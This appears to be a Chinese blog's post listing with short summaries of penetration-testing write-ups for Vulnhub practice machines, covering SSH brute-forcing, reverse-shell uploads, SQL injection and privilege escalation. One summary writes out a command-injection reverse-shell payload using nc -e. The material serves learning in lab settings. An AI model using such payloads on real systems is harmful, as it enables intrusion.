自定义博客皮肤VIP专享

*博客头图:

格式为PNG、JPG,宽度*高度大于1920*100像素,不超过2MB,主视觉建议放在右侧,请参照线上博客头图

请上传大于1920*100像素的图片!

博客底图:

图片格式为PNG、JPG,不超过1MB,可上下左右平铺至整个背景

栏目图:

图片格式为PNG、JPG,图片宽度*高度为300*38像素,不超过0.5MB

主标题颜色:

RGB颜色,例如:#AFAFAF

Hover:

RGB颜色,例如:#AFAFAF

副标题颜色:

RGB颜色,例如:#AFAFAF

自定义博客皮肤

-+
  • 博客(35)
  • 收藏
  • 关注

原创 broken-gallery靶机

将内容写入readme.md中,使用 xxd 转换,查看文件,发现文件头为 JFIF ,是一张图片。一段留言,把上面的一些可能作为账号密码的字符拿下来,写个简单的字典,尝试爆破 ssh。看到 timedatectl 可以执行root权限,执行命令,提权成功。readme.md 中是十六进制的值。访问80端口,可以看到有一些文件。将后缀修改为 jpg ,查看图片。使用 hydra 进行爆破。ssh连接,连接成功。

2024-08-14 20:09:32 572

原创 DC-4靶机

sudo -l ,teehee是个小众的linux编辑器。如果有sudo权限。有charles密码 ^xHhA&hvim0y,切换到charles。jim目录下有密码字典,并将字典下载下来,使用hydra进行破解。说是有一封信,在/var/mail。使用 python3 提升交互性。访问80端口,发现一个登录界面。查看/etc/passwd。sudo -l,不知道密码。bp抓包,是命令执行。

2024-08-14 20:08:59 318

原创 symfonos2靶机

使用 msf 工具进行 ssh 登录,使用 metasploit 工具,查找 ssh 登录模块。查看 anonymous 文件夹,在 backups 目录下发现 log.txt 文件。发现网站使用的是libreNMS 系统,使用 msf 查看一下该系统是否存在漏洞。下载此文件查看,发现一个 aeolus 用户,在本地目录下打开。进行端口转发,将本地的9999端口映射到靶机的8080端口。发现两个命令执行漏洞,使用第二个,查看一下需要设置的选项。使用第一个,看一下需要配置的选项。升级会话,使用新会话。

2024-08-13 19:54:40 498

原创 sp eric靶机

访问 /upload/php-reverse-shell.php,成功反弹 shell。输入ls -la命令,发现backup.sh文件可写可执行。查看 backup.sh文件内容,可能是计划任务,看一眼。,发现登录框界面,尝试sql注入,弱口令等,没有结果。使用 python 提升交互性,发现没有python。最后在 /root 下发现一个 flag.txt。,那么用 python3 执行。查看下载的源码,发现账号密码。看看 .git ,使用。尝试登录,发现登录成功。发现存在文件上传功能,

2024-08-13 19:18:35 482

原创 WebDeveloper:1靶机

把kali linux自带的php反弹shell代码(/usr/share/webshells/php/php-reverse-shell.php)直接把/usr/share/webshells/php/php-reverse-shell.php改一下$ip和$port,保存,并上传。找到其位置在/var/www/html/wp-content/uploads/2022/01/php-reverse-shell.php。首先,输入如下命令查找php-reverse-shell.php的位置。

2024-08-12 18:44:06 309

原创 Lazysysadmin靶机

1.逐个拼接扫描到的目录,/robots.txt -> 逐个拼接/robots.txt的内容 ->【无用】1.已知用户可能为【togie】用hydra,爆破ssh密码 -> 账号密码【togie:12345】2.拼接/phpmyadmin/ -> 尝试万能密码绕过和弱密码爆破 -> 【无果】3.拼接/wordpress,查看页面信息?用户名是togie吗?老规矩,查看用户权限 -> 显示all ->尝试直接提权 ->成功。2.尝试连接ssh,

2024-08-12 18:41:48 199

原创 Matrix:1靶机

信息收集靶机扫描端口扫描,开放端口22、80、31337目录扫描网址访问进行源码查看,没有发现什么有用的信息拼接目录扫描出的目录/assets根据端口扫描结果还有一个http服务端口,网址访问31337端口进行源码查看,有base64的编码在线解码翻译一下,是echo一段短句进入了Cypher.matrix文件尝试访问Cypher.matrix网页,发现存在一个.bak文件,我们直接下载,用记事本打开后发现为BF编码利用在线网站(Brainfuck/Ook! Obfuscation/Enc

2024-08-11 17:15:51 636

原创 DC-2靶机

查看后发现wordpress后台用户密码:webdeveloper:Te5eQg&4sBS!将主题背景改为Twenty Sixteen,点击select然后将404.php源码再次修改为反弹shell的代码。利用wordpress的上传theme功能getshell。进入该目录发现一个流量包,下载使用wireshark打开。用找到的用户名密码登录wordpress,登录成功。进行目录扫描,发现ipdata目录。在下处发现一处文件上传页面。拼接/wp-admin。

2024-08-11 17:13:10 480

原创 West-Wild-v1.1靶机

这里看到有一个 wave 共享,访问一下,需要密码,扫描结果中有很多显示空密码,空密码连接成功。80端口没发现,从139和445这两个smb服务入手,枚举用户、查找共享文件夹。查看当前目录下文件,看到一个 flag.txt ,下载下来查看。base64解码,得到 flag 1 ,以及一个账号密码。显示为 all ,直接 sudo su 提权,提权成功。查看当前权限,suid、sudo等都没有可利用的。查看文件内容,得到 aveng 用户的密码。端口开放了,22、80、139、445。目录扫描,没什么信息。

2024-08-11 17:12:27 492

原创 unknowndevice64: 1靶机

提示需要密码,图片名称为 key_is_h1dd3n,那么密码就是 h1dd3n,成功提取出了h1dd3n.txt;文件信息为一种brainfuck的程序语言,使用在线工具。[export命令用于设置或显示环境变量,在shell中执行程序时,shell会提供一组环境变量,export可新增,修改或删除环境变量]端口扫描,开放1337-ssh端口服务,31337-http端口服务;下载图片到本地,可使用kali中的工具steghid(开源隐写程序)查看源码,发现隐藏目录:Key_is_hidd3n.jpg。

2024-08-11 17:11:25 311

原创 DC-6靶机

用bp抓包一下,在bp中输入baidu.com | nc -e /bin/sh 192.168.93.130 7878进行反弹shell,同时在kali中监听7878端口。根据靶机线索给予的代码,可以得到一个密码字典,这个字典在kali里面是有的,将文件输出到当前目录的passwords.txt。发现目录下面是几个用户文件,进去查看,在mark用户中,发现独有的stuff文件,查看文件内容。得到admin,mark,graham,sarah,jens几个用户名。

2024-08-11 17:10:50 346

原创 W34kn3ss 1靶机

当我们检查代码的文件类型时,发现是一个python编译的文件,把它复制到/var/www/html,就可以在系统上下载这个文件了。打开mykey.pub,是base64编码的ssh公钥,在在线解码器里面没有解出来,应该需要借助工具。网址进行访问http://weakness.jth,访问是空白页面的话,换一个浏览器就可以了。页面访问443端口,会提示用https服务,会出现和80端口一样的页面,进行目录扫描。各处看了一下,好像没有什么信息了,就只剩22、443端口了,查看443端口,对这个文件进行重命名。

2024-08-11 17:10:03 813

原创 wakanda-1靶机

还发现一个test文件,仔细观察后发现,test文件每隔五分钟就会被修改一次,说明有一个定时任务在不断调用.antivirus.py。在/srv发现一个隐藏文件.antivirus.py,该文件任意用户都有写权限,但没有执行权限。ssh连接 mamadou : Niamey4Ever227!拼接参数存在php伪协议的文件包含,包含首页文件inde.php。将.antivirus.py文件修改为反弹shell的代码。这是一个python环境,家目录下有个flag文件。主机发现,注意找mac地址对应的ip。

2024-08-08 19:53:27 450

原创 basic_pentesting_2靶机

创建个key文件,给他一个执行权限并将私钥内容复制到其中保存,并利用 ssh2john 将 key 转换为哈希。大致理解意思是 j 用户可能是个弱密码,可以尝试爆破22端口开放,大概率是ssh弱口令漏洞。发现没有权限,接着在 .ssh 文件目录下发现ssh的私钥和公钥文件且普通用户可以进行查看。查看用户家目录下,在kay目录下发现pass.pak和ssh公私钥文件。开放了22、80、139、445、8009、8080端口。发现密码不对,查看之前的pass.pck文件。查看pass.pak文件,没有权限。

2024-08-08 19:28:08 358

原创 BlackMarket靶机

因此,我们探索以下 URL http://192.168.1.104/squirrelmail/,并输入以下给定的凭据,如 第四个flag (Jason Bourne电子邮件访问?Web登录页面没有验证码,ftp也可以访问,但是需要账号密码,这里保留对两处爆破的想法。查看上面的提示,我专注于“车辆车间”,并开始检查网络浏览器以查找具有车辆/车间的每个可能目录,不幸的是,我在尝试时检索了以下网页。在这里,我找到了一些数据库名称,根据我的考虑,它应该是黑市,因此,为了不浪费时间,我提前从其中获取表。

2024-08-07 20:32:43 1289

原创 Bob_v1.0.1靶机

在 /home/bob/Documents/Secret/Keep_Out/Not_Porn/No_Lookie_In_Here 下,发现了 notes.sh。cd到home目录下,查看,发现有四个用户的家目录,先到bob目录下查看,发现一个可能存在密码的文件.old_passwordfile.html。dev_shell.php页面发现存在过滤,一些命令无法执行,执行whoami | ls,发现一个备份文件。查看文件内容,没看懂,网上搜了一下,是藏头诗,密钥为 HARPOCRATES。

2024-08-07 18:46:03 484

原创 W1R3S.inc靶机

"和"we have a lot of work to do, stop playing around", 整段意思是"我不认为这是得到root权限的一种方式, 我们有很多工作要去做, 停止在这里乱搞", 简单来说此处啥都搞不了, 要从其他地方入手。解密后的内容为"lt is easy, but not that easy", 意思是"这是简单的, 但不是那个简单", 字面意思有点模拟两可, 属于无效信息。浏览器访问:, 没有回显, 此处用的是Get请求, 后面尝试下POST请求。

2024-08-06 18:52:36 359

原创 DerpNStink靶机

拼接/php/phpmyadmin/ 一个mysql管理界面,不知道版本,只能口令爆破一下,用了root root’ or 1=1#常见的账号密码都不行,就暂时放一下。提示可以在靶机下运行derpy文件,但是实际上靶机上不存在该目录和文件,这里我们创建个相同目录,然后创建文件,随意写入代码;先访问页面,查看网页源代码,获得第一个flag,并获得提示,在hosts配置DNS。在ssh目录下找了key文件(目录隐藏的比较深),通过ftp下载key.txt文件到本地;没什么发现了,用dirb扫描一下目录。

2024-08-05 20:36:27 412

原创 EvilScience VM靶机

网络发现开放着22,80端口在浏览器中打开 IP 地址目录扫描,发现该网站存在这么一个url,疑似存在LFI(本地文件包含)漏洞;对可能存在文件包含漏洞的页面进行burp抓包,对file参数后面进行文件爆破标记之后,加入文件包含可能存在的文件的字典利用ssh登录产生错误日志写入一句话木马访问执行命令。

2024-08-05 20:35:53 279

原创 Basic penetration靶机

先看看可以利用的脚本,输入 search proftpd 1.3.3(为什么是proftpd 1.3.3,因为之前探测到是这个版本)优化命令执行终端,执行下面命令进入python交互式(注意要下载python环境才能运行)根据服务版本搜索相关漏洞,在kali输入 msfconsole命令,进入到该框架内。由上图,我们进入利用的脚本,选择用序号2的那一个:use 2;查看要设置的参数(show options)

2024-08-04 18:49:15 384

原创 DepthB2R靶机

访问扫描到的接口,提示输入 ls -l /tmp,并尝试查看其他目录,和其他系统命令。ps -aux发现有ssh但nmap却没有扫描到,原来在/etc有防火墙。尝试弱口令登录时,发现了一组账号密码,但并没有登录成功。sudo -l,查看当前权限,显示all。关闭防火墙,并反弹shell,sudo su 提权成功。主机发现,端口目录扫描。

2024-08-04 18:48:39 301

原创 Dina-1-0-1靶机

主机发现,端口目录扫描在/nothing的源代码发现 账号密码/secure/目录下有个压缩包解压需要密码,freedom,是一个MP3格式的文件媒体播放器打不开,用记事本打开看一下,给了一个接口和账号账号touhid密码dinan,发现是playsms,去msf上搜一下发现是普通用户,提权。

2024-08-04 18:47:50 184

原创 RickdiculouslyEasy靶机

尝试提权都失败,尝试查看是否有其他用户的文件,到home下发现三个用户的信息,先查看Morty的,发现里面有文件,但是下载不了,开启远程服务,在本机进行下载。发现页面没有可点击的地方,记得在扫描的时候发现有个9090端口,也是http,进行拼接查看,发现第二个flag。,发现一张图片,但是图片名字有password,尝试使用010 Editor查看,发现了密码Meeseek。时,发现下载下一个压缩包,尝试解压时,发现需要密码,试了试winter但是不对,暂时搁置。输入127.0.0.1;

2024-08-04 18:47:15 441

原创 zico2: 1靶机

',出现的新页面,它的url可能存在文件包含漏洞,输入../../../../../../etc/passwd验证,发现存在此漏洞。根据最初得到的文件包含漏洞,将文件包含漏洞和phpLiteAdmin结合起来,向phpLiteAdmin写入一句话木马,利用文件包含漏洞执行插入的恶意代码。page=../../../../../usr/databases/hack.php,写入成功。拼接/dbadmin/ ,点击test_db.php文件,出现一个新的登录框。根据描述创建一个新的数据库hack.php。

2024-08-04 18:46:11 537

原创 Breach 2.1 靶机

telnet 127.0.0.1 2323,连接一下此端口,有个坐标,搜索发现这个坐标刚好是休斯顿(houston)的坐标。分析源码,问题答案是mine,如果在三秒内没有回答正确,就会杀死进程,那么再尝试登录并在3秒内输入mine,成功登录。由于注册时没有对输入的用户名进行防护,导致将构造的XSS语句存入了数据库,查看个人信息将会触发用户名的XSS语。看着像是http服务,用nmap再扫下端口,又多了个服务,8888端口有个http服务。目录,拼接admin,之前扫出来的admin,admin登录。

2024-08-01 21:56:38 469

原创 FristiLeaks靶机

返回首页,查看页面源代码,出现“We need to clean this up for production. I left some junk in here to make testing easier. --by eezeepz”可能存在用户eezeepz,并发现了base64加密的内容。构造一个图片,命名为phpinfo.php,进行上传,抓包,修改后缀为.php.jpg。看到登录框,利用burp抓包,查看是否存在SQL注入,经检验,不存在。在蚁剑终端下载生成的木马,并赋予执行权限,执行。

2024-08-01 21:55:55 442

原创 SkyTower 靶机

得到账号密码,就可以尝试使用ssh连接,但连接失败,因为靶机22端口处于filtered状态,此时只剩下3128端口,这个是一个(http-proxy)代理服务,那么有没有可能是22端口需要经3128端口服务代理之后才能访问;sudo切换sara用户却发现无法切换,此时只能退出使用ssh连接,却发现它如同john登录一样,得删除掉.bashrc文件。尝试使用||代替or,拼接'||1#,显示登录成功,并出现一组账号密码:john hereisjohn。重新尝试使用ssh连接,此时就不存在自动退出的操作。

2024-07-31 19:08:10 144

原创 Kioptrix : Level 1.2靶机

使用 nmap 扫描结果,可以看到 HTTP 服务在 2 个端口上运行,即端口 22,80。')会出现SQL错误提示。因此,这意味着 URL 容易受到 SQL 注入的影响。使用 SQLMAP 命令枚举数据库以获取更多详细信息。直接执行 sudo -l不行,看看可以执行什么。id=1之后加上',即(通过尝试。执行sudo /bin/bash提权成功。查看表下字段user和accounts。查看/etc/passwd,有利用漏洞。访问192.168.111.131。查看靶机发行版本信息。查看readme文件。

2024-07-30 20:56:55 354

原创 Hack the 21LTR: Scene 1 靶机

在端口 10001 上启动了一个 netcat 会话,我们得到了一个空白的 shell。cmd=id,尝试运行 id命令,发现得到回复。创建root权限的新用户和密码,将自动生成的hash值加入/etc/passwd。将文件下载到我们的本地系统后,我们使用 cat 命令在kali中打开该文件。发现扫描都没有,右键查看源代码,获得了一些登录凭据。ls,发现一个backup_log.php文件。在网站路径上拼接/logs/,发现访问被拒绝。再尝试ftp连接,发现连接成功。尝试ssh连接,发现连接失败。

2024-07-30 20:56:12 419

原创 De-ICE:S1.120靶机

在执行 sudo –l 时,我们观察到在执行命令 /home/ccoffee/scripts/getlogs.sh 时没有为此用户设置密码。查看开启端口,可以看到端口 80、443、3306、21、22 已打开。切换到/home/ccoffee/scripts/目录下。命令启用了 SUID 位,这意味着我们可以执行。从截图中可以看出,在列出的所有用户中,用户。通过SSH测试它们,所有用户都可以登录系统。此时,我们还检查一下 sudo 文件的内容。,然后使用以下代码创建一个新的。点击Add Product。

2024-07-30 20:55:16 403

原创 holynix-v1靶机,提权

抓包,尝试水平越权,把id改为其他的,因为刚刚在username中看到很多用户。点击login,发现用户登录,使用弱口令测试一下,登陆不上,测试SQL。更改文件 /tmp/bash 的所有权,以便从此 root 成为所有者。执行命令 /bin/tar(理想情况下运行 /bin/bash)将现有的 /bin/tar 文件备份到 bin/tar.bak。现在将 /tmp/bash 文件移动到 /bin/tar。将 /bin/bash 文件复制到 /tmp 文件夹。访问192.168.111.148。

2024-07-29 21:32:04 329

原创 Vulnhub lin security靶场

利用辅助网站:https://gtfobins.github.io/将ro 替换为 rw signie init=/bin/bash。netplan apply重启网络,再重启机器就能获得ip。在开机的时候摁下shift进入下图界面。知道用户bob密码secret。修改enp0s3为ens33。写好了摁ctrl+x启动。方法二:suid提权。

2024-07-29 21:30:20 555

原创 Hacknos-3

使用网站首页的邮箱作为是用户名,passwd.txt作为密码开始使用hydra对后台进行延迟暴力破解....得出:contact@hacknos.com:SecurityX。使用搜索引擎检索下Gila CMS的可利用漏洞找到以下两个漏洞,文件包含漏洞需要登录后台,所以接下来的思路就是尝试弱口令爆破。在页面下面看见websec 尝试拼接,没有东西,尝试目录扫描看看,发现好多目录,进行拼接。拼接admin,发现登录框,在上面看到了Gila CMS框架。访问192.168.7.5。目录下上传一句话文件,访问。

2024-07-12 15:09:31 186

原创 Hacknos-OS-Bytesec

Enum4linux是用于枚举windows和Linux系统上的SMB服务的工具。查看一番后尝试进入smb用户的目录下(网站首页中也提到。以尝试弱密码登录,smb用户的密码为空时可以登录。查看为无线网络数据包,发现无线网络的SSID为。常规扫描并获取用户列表,发现有一个smb用户。尝试SSH登录目标主机,成功登录。访问192.168.7.241。)....发现有两个文件并使用。上一步破解出无线名称密码为。解压缩包后发现两个文件。

2024-07-12 15:08:31 214

原创 holynix-v1靶机

抓包,尝试水平越权,把id改为其他的,因为刚刚在username中看到很多用户。点击login,发现用户登录,使用弱口令测试一下,登陆不上,测试SQL。点击Message Board,发现留言板,测试xss。点击Security,F12发现可能存在文件包含。修改时在关机状态下修改,修改好后打开。访问192.168.111.148。点击Directory,发现有用户。上传页面有个上传压缩包,自动解压。nc -lvnp 5555监听。上传一个php文件,不让上传。发现上传成功,并且用户也变了。

2024-07-12 15:07:21 531

空空如也

空空如也

TA创建的收藏夹 TA关注的收藏夹

TA关注的人

提示
确定要删除当前文章?
取消 删除